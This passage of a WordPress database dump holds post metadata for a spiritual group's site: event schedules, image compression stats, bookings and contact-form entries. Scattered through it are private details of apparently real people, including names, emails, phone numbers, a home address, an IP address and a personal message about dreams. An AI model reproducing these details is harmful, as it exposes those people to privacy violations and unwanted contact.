/>\r\n%%blog_name%%</p>\";}}'),(191170,268965,'passster_activate_global_protection',NULL),(191171,268965,'passster_activate_protection',NULL),(191172,268965,'passster_protection_type','password'),(191173,268965,'boldgrid_in_page_containers','1'),(191174,268965,'passster_area_shortcode',''),(191175,268965,'mec_cost_auto_calculate','0'),(191176,268965,'mec_style_per_event','global'),(191177,268965,'mec_trailer_url',''),(191178,268965,'mec_trailer_title',''),(191179,268965,'mec_start_datetime','2023-10-01 10:30 AM'),(191180,268965,'mec_end_datetime','2023-10-01 11:30 AM'),(191181,268965,'mec_sequence','22'),(191182,268965,'mec_event_gallery','a:0:{}'),(191183,268965,'mec_related_events','a:0:{}'),(191184,268965,'mec_banner','a:0:{}'),(191185,268965,'_dp_original','264610'),(191186,268965,'_edit_lock','1696272630:2'),(191187,268966,'_wp_attached_file','2023/08/spiritual-dreaming-book-1.jpg'),(191188,268966,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:706;s:6:\"height\";i:442;s:4:\"file\";s:37:\"2023/08/spiritual-dreaming-book-1.jpg\";s:8:\"filesize\";i:66249;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-313x196.jpg\";s:5:\"width\";i:313;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15701;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6836;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20389;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-500x442.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45062;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31962;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23158;}s:8:\"tileview\";a:5:{s:4:\"file\";s:37:\"spiritual-dreaming-book-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23071;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191189,268966,'original-file','2023/08/spiritual-dreaming-book-1-updraft-pre-smush-original.jpg'),(191190,268966,'smush-complete','1'),(191191,268966,'smush-info','The file was compressed from 64.70 KB to 63.39 KB, saving 2.01 percent, using WP-Optimize'),(191192,268966,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:66249;s:12:\"smushed-size\";i:64915;s:15:\"savings-percent\";d:2.0099999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:66249;s:10:\"compressed\";i:64915;}s:6:\"medium\";a:2:{s:8:\"original\";i:15701;s:10:\"compressed\";i:15701;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6836;s:10:\"compressed\";i:6836;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20389;s:10:\"compressed\";i:20389;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:45062;s:10:\"compressed\";i:44995;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31962;s:10:\"compressed\";i:31962;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:23158;s:10:\"compressed\";i:23158;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23071;s:10:\"compressed\";i:23071;}}}'),(191193,268965,'_edit_last','2'),(191194,268965,'_thumbnail_id','268966'),(191195,268968,'_field_30','Deborah'),(191196,268968,'_field_31','Fields'),(191197,268968,'_field_32','(720) 238-2914'),(191198,268968,'_field_33','dfields3030@gmail.com'),(191199,268968,'_field_34','1685 Cowles Ave., #A-108'),(191200,268968,'_field_35','Longmont'),(191201,268968,'_field_36','CO'),(191202,268968,'_field_37','US'),(191203,268968,'_field_39',''),(191204,268968,'_form_id','4'),(191205,268968,'_seq_num','36'),(191206,268969,'mec_transaction_id','OMK70997'),(191207,268969,'mec_gateway','MEC_gateway_free'),(191208,268969,'mec_gateway_label','Free'),(191209,268969,'mec_user_id','1000092'),(191210,268969,'mec_verified','1'),(191211,268969,'mec_verification_key','f8b712cb99d66814ac233a48c0a73fba'),(191212,268969,'mec_cancellation_key','3c65cc25b9f9e53814ed6cbd4dece2bb'),(191213,268969,'mec_confirmed','1'),(191214,268969,'mec_event_id','268940'),(191215,268969,'mec_date','1693737000:1693740600'),(191216,268969,'mec_ticket_id',',1,'),(191217,268969,'mec_booking_time','2023-09-03 10:23:20'),(191218,268969,'mec_all_dates','a:0:{}'),(191219,268969,'mec_other_dates','a:0:{}'),(191220,268969,'mec_attention_time','1693737000:1693740600'),(191221,268969,'mec_attention_time_start','1693737000'),(191222,268969,'mec_attention_time_end','1693740600'),(191223,268969,'mec_book_date_submit','20230903102320'),(191224,268969,'mec_booking_location','118'),(191225,268969,'mec_ticket_price_1','0'),(191226,268969,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"katyahuu@gmail.com\";s:4:\"name\";s:11:\"Kathy Young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"172.59.231.101\";}}'),(191227,268969,'mec_price','0'),(191228,268969,'mec_payable','0'),(191229,268969,'mec_local_timezone','America/Denver'),(191230,268970,'_field_224','Joni'),(191231,268970,'_field_225','Bellamy'),(191232,268970,'_field_226','joni.hedin@gmail.com'),(191233,268970,'_field_227','CO'),(191234,268970,'_field_228','US'),(191235,268970,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(191236,268970,'_form_id','21'),(191237,268970,'_seq_num','186'),(191238,268972,'protect_children',''),(191239,268972,'mec_color',''),(191240,268972,'mec_location_id','187'),(191241,268972,'mec_dont_show_map','0'),(191242,268972,'mec_organizer_id','1'),(191243,268972,'mec_read_more',''),(191244,268972,'mec_more_info',''),(191245,268972,'mec_more_info_title',''),(191246,268972,'mec_more_info_target','_self'),(191247,268972,'mec_cost',''),(191248,268972,'mec_currency','a:0:{}'),(191249,268972,'mec_additional_organizer_ids','a:0:{}'),(191250,268972,'mec_additional_location_ids','a:0:{}'),(191251,268972,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-13\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-13\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(191252,268972,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191253,268972,'mec_certain_weekdays','a:0:{}'),(191254,268972,'mec_allday','0'),(191255,268972,'one_occurrence','0'),(191256,268972,'mec_hide_time','0'),(191257,268972,'mec_hide_end_time','0'),(191258,268972,'mec_comment',''),(191259,268972,'mec_timezone','global'),(191260,268972,'mec_countdown_method','global'),(191261,268972,'mec_public','1'),(191262,268972,'mec_start_date','2023-09-13'),(191263,268972,'mec_start_time_hour','6'),(191264,268972,'mec_start_time_minutes','30'),(191265,268972,'mec_start_time_ampm','PM'),(191266,268972,'mec_start_day_seconds','66600'),(191267,268972,'mec_end_date','2023-09-13'),(191268,268972,'mec_end_time_hour','7'),(191269,268972,'mec_end_time_minutes','30'),(191270,268972,'mec_end_time_ampm','PM'),(191271,268972,'mec_end_day_seconds','70200'),(191272,268972,'mec_repeat_status','0'),(191273,268972,'mec_repeat_type',''),(191274,268972,'mec_repeat_interval','1'),(191275,268972,'mec_repeat_end',''),(191276,268972,'mec_repeat_end_at_occurrences',''),(191277,268972,'mec_repeat_end_at_date',''),(191278,268972,'mec_advanced_days','a:0:{}'),(191279,268972,'mec_in_days',''),(191280,268972,'mec_not_in_days',''),(191281,268972,'mec_hourly_schedules','a:0:{}'),(191282,268972,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191283,268972,'mec_tickets','a:0:{}'),(191284,268972,'mec_fees_global_inheritance','1'),(191285,268972,'mec_fees','a:0:{}'),(191286,268972,'mec_ticket_variations_global_inheritance','1'),(191287,268972,'mec_ticket_variations','a:0:{}'),(191288,268972,'mec_reg_fields_global_inheritance','1'),(191289,268972,'mec_reg_fields','a:0:{}'),(191290,268972,'mec_bfixed_fields','a:0:{}'),(191291,268972,'mec_op','a:0:{}'),(191292,268972,'mec_fields','a:0:{}'),(191293,268972,'mec_event_status','EventScheduled'),(191294,268972,'mec_moved_online_link',''),(191295,268972,'mec_cancelled_reason',''),(191296,268972,'mec_display_cancellation_reason_in_single_page',''),(191297,268972,'boldgrid_hide_page_title','0'),(191298,268972,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(191299,268972,'passster_activate_global_protection',NULL),(191300,268972,'passster_activate_protection',NULL),(191301,268972,'passster_protection_type','password'),(191302,268972,'boldgrid_in_page_containers','1'),(191316,268972,'_dp_original','267696'),(191304,268972,'passster_area_shortcode',''),(191305,268972,'_wp_old_date','2023-01-14'),(191306,268972,'mec_cost_auto_calculate','0'),(191307,268972,'mec_style_per_event','global'),(191308,268972,'mec_trailer_url',''),(191309,268972,'mec_trailer_title',''),(191310,268972,'mec_start_datetime','2023-09-13 06:30 PM'),(191311,268972,'mec_end_datetime','2023-09-13 07:30 PM'),(191312,268972,'mec_sequence','19'),(191313,268972,'mec_event_gallery','a:0:{}'),(191314,268972,'mec_related_events','a:0:{}'),(191315,268972,'mec_banner','a:0:{}'),(191317,268972,'_edit_lock','1693767653:2'),(191318,268972,'_edit_last','2'),(191319,268973,'_wp_attached_file','2023/09/happy-girl-on-mountain.jpg'),(191320,268973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:798;s:6:\"height\";i:446;s:4:\"file\";s:34:\"2023/09/happy-girl-on-mountain.jpg\";s:8:\"filesize\";i:92656;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21659;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8659;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-768x429.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:429;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74079;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25938;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-500x446.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55910;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40506;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29312;}s:8:\"tileview\";a:5:{s:4:\"file\";s:34:\"happy-girl-on-mountain-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30084;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191321,268972,'_thumbnail_id','268973'),(191322,268973,'original-file','2023/09/happy-girl-on-mountain-updraft-pre-smush-original.jpg'),(191323,268973,'smush-complete','1'),(191324,268973,'smush-info','The file was compressed from 90.48 KB to 87.29 KB, saving 3.53 percent, using WP-Optimize'),(191325,268973,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:92656;s:12:\"smushed-size\";i:89387;s:15:\"savings-percent\";d:3.529999999999999804600747665972448885440826416015625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:92656;s:10:\"compressed\";i:89387;}s:6:\"medium\";a:2:{s:8:\"original\";i:21659;s:10:\"compressed\";i:21191;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8659;s:10:\"compressed\";i:8593;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:74079;s:10:\"compressed\";i:73321;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25938;s:10:\"compressed\";i:25487;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:55910;s:10:\"compressed\";i:54913;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:40506;s:10:\"compressed\";i:39812;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:29312;s:10:\"compressed\";i:28788;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30084;s:10:\"compressed\";i:29791;}}}'),(191353,266942,'passster_area_shortcode',''),(193272,269167,'_field_654','Roger'),(193273,269167,'_field_652','Arndt'),(193274,269167,'_field_653','rarndt34@gmail.com'),(191357,268983,'protect_children',''),(191358,268983,'_wp_page_template','default'),(191359,268983,'passster_activate_protection',NULL),(191360,268983,'passster_protection_type','password'),(191361,268983,'boldgrid_hide_page_title','0'),(191362,268983,'boldgrid_in_page_containers','1'),(191363,268983,'bgseo_robots_index','index'),(191364,268983,'bgseo_robots_follow','follow'),(191365,268983,'passster_activate_global_protection',NULL),(191366,268983,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(191369,268983,'_dp_original','266942'),(191368,268983,'passster_area_shortcode',''),(191370,268983,'_edit_lock','1694415259:2'),(191371,268983,'_edit_last','2'),(193674,269201,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193675,269201,'_field_649',''),(193656,269199,'_field_653','roundoc@me.com'),(193655,269199,'_field_652','Rountree'),(193654,269199,'_field_654','Robert'),(193653,269198,'_seq_num','57'),(193651,269198,'_field_649',''),(193652,269198,'_form_id','61'),(193650,269198,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193649,269198,'_field_651','(303) 845-0604'),(193644,269197,'_form_id','61'),(193643,269197,'_field_649',''),(193641,269197,'_field_651','(303) 830-8872'),(193642,269197,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193640,269197,'_field_653','ginnybrook@hotmail.com'),(193639,269197,'_field_652','Brookhouser'),(193638,269197,'_field_654','Virginia (Ginny)'),(193966,269249,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193965,269249,'_field_651','(510) 332-9152'),(193964,269249,'_field_653','dennywilliams14@gmail.com'),(193963,269249,'_field_652','Denny'),(193962,269249,'_field_654','Nicole'),(193957,269248,'_field_651','(720) 745-1893'),(193958,269248,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193959,269248,'_field_649',''),(193960,269248,'_form_id','61'),(193961,269248,'_seq_num','87'),(193672,269201,'_field_653','valeri.cantu@comcast.net'),(193673,269201,'_field_651','(720) 334-5169'),(193671,269201,'_field_652','Cantu'),(193669,269200,'_seq_num','59'),(193670,269201,'_field_654','Valeri'),(191404,269002,'original-file','2023/09/sky-birds-3-updraft-pre-smush-original.jpg'),(191405,269002,'smush-complete','1'),(191406,269002,'smush-info','The file was compressed from 431.91 KB to 420.27 KB, saving 2.7 percent, using WP-Optimize'),(191407,269002,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:442277;s:12:\"smushed-size\";i:430354;s:15:\"savings-percent\";d:2.70000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:442277;s:10:\"compressed\";i:430354;}s:6:\"medium\";a:2:{s:8:\"original\";i:14198;s:10:\"compressed\";i:14198;}s:5:\"large\";a:2:{s:8:\"original\";i:120738;s:10:\"compressed\";i:120306;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6364;s:10:\"compressed\";i:6298;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:72076;s:10:\"compressed\";i:72076;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20080;s:10:\"compressed\";i:20080;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:47778;s:10:\"compressed\";i:47778;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:32295;s:10:\"compressed\";i:32295;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22636;s:10:\"compressed\";i:22636;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24997;s:10:\"compressed\";i:24997;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:245594;s:10:\"compressed\";i:243707;}}}'),(191402,269002,'_wp_attached_file','2023/09/sky-birds-3.jpg'),(191403,269002,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1279;s:4:\"file\";s:23:\"2023/09/sky-birds-3.jpg\";s:8:\"filesize\";i:442277;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-294x196.jpg\";s:5:\"width\";i:294;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14198;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"sky-birds-3-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120738;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6364;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72076;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20080;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47778;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32295;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22636;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"sky-birds-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24997;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"sky-birds-3-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245594;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193954,269248,'_field_654','Rolf'),(193955,269248,'_field_652','Mueller-Uri'),(193956,269248,'_field_653','ninesilentones@aol.com'),(193945,269244,'_seq_num','148'),(193944,269244,'_form_id','13'),(193941,269244,'_field_135','allanborenstein@yahoo.com'),(193942,269244,'_field_137','Dreams'),(193943,269244,'_field_138','Hello,\n\nI have had several dreams featuring biblical symbols.  Noah\'s ark, a man who may have been Moses,\none of the tablets of the 10 commandments.  Also I am seeing war, nuclear weapons, etc.\nIs this a sign of the Apocalypse? Or that I have a connection to those symbols?  Is there\nsomeone I can talk to (preferably on the phone.)\n\nThank you.  Allan'),(193939,269244,'_field_133','Allan'),(193940,269244,'_field_134','Borenstein'),(191899,269107,'protect_children',''),(191900,269107,'mec_color',''),(191901,269107,'mec_location_id','122'),(191902,269107,'mec_dont_show_map','0'),(191903,269107,'mec_organizer_id','1'),(191904,269107,'mec_start_date','2023-10-01'),(191905,269107,'mec_start_time_hour','10'),(191906,269107,'mec_start_time_minutes','30'),(191907,269107,'mec_start_time_ampm','AM'),(191908,269107,'mec_start_day_seconds','37800'),(191909,269107,'mec_end_date','2023-10-01'),(191910,269107,'mec_end_time_hour','11'),(191911,269107,'mec_end_time_minutes','30'),(191912,269107,'mec_end_time_ampm','AM'),(191913,269107,'mec_end_day_seconds','41400'),(191914,269107,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-01\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-01\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(191915,269107,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191916,269107,'mec_certain_weekdays','a:0:{}'),(191917,269107,'mec_allday','0'),(191918,269107,'mec_hide_time','0'),(191919,269107,'mec_hide_end_time','0'),(191920,269107,'mec_comment',''),(191921,269107,'mec_repeat_status','0'),(191922,269107,'mec_repeat_type',''),(191923,269107,'mec_repeat_interval','1'),(191924,269107,'mec_repeat_end',''),(191925,269107,'mec_repeat_end_at_occurrences','9'),(191926,269107,'mec_repeat_end_at_date',''),(191927,269107,'mec_advanced_days','a:0:{}'),(191928,269107,'mec_in_days',''),(191929,269107,'mec_not_in_days',''),(191930,269107,'mec_hourly_schedules','a:0:{}'),(191931,269107,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191932,269107,'mec_tickets','a:0:{}'),(191933,269107,'mec_fees_global_inheritance','1'),(191934,269107,'mec_fees','a:0:{}'),(191935,269107,'mec_ticket_variations_global_inheritance','1'),(191936,269107,'mec_ticket_variations','a:0:{}'),(191937,269107,'mec_reg_fields_global_inheritance','1'),(191938,269107,'mec_reg_fields','a:0:{}'),(191939,269107,'mec_op','a:0:{}'),(191940,269107,'mec_event_date_submit','20210422105713'),(191941,269107,'mec_read_more',''),(191942,269107,'mec_more_info',''),(191943,269107,'mec_more_info_title',''),(191944,269107,'mec_more_info_target','_self'),(191945,269107,'mec_cost',''),(191946,269107,'mec_currency','a:0:{}'),(191947,269107,'mec_additional_organizer_ids','a:0:{}'),(191948,269107,'mec_additional_location_ids','a:0:{}'),(191949,269107,'one_occurrence','0'),(191950,269107,'mec_timezone','global'),(191951,269107,'mec_countdown_method','global'),(191952,269107,'mec